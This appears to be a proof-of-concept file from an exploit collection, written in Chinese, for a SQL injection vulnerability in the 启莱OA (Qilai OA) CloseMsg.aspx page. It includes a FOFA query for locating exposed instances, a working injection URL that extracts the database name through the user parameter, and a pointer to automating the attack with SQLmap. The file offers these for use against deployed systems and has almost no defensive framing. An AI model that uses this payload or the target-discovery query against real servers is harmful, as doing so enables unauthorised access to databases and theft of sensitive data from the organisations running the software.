Awesome-POC/OA产品漏洞/启莱OA CloseMsg.aspx SQL注入漏洞.md

34 lines
529 B
Markdown
Raw Normal View History

2022-02-21 09:35:01 +08:00
# 启莱OA CloseMsg.aspx SQL注入漏洞
## 漏洞描述
启莱OA CloseMsg.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
存在SQL注入的文件为 CloseMsg.aspx
```plain
http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
```
2022-12-05 11:09:28 +08:00
![qilai-3-1](./images/qilai-3-1.png)
2022-02-21 09:35:01 +08:00
使用SQLmap对参数 user 进行注入
2022-12-05 11:09:28 +08:00
![qilai-3-2](./images/qilai-3-2.png)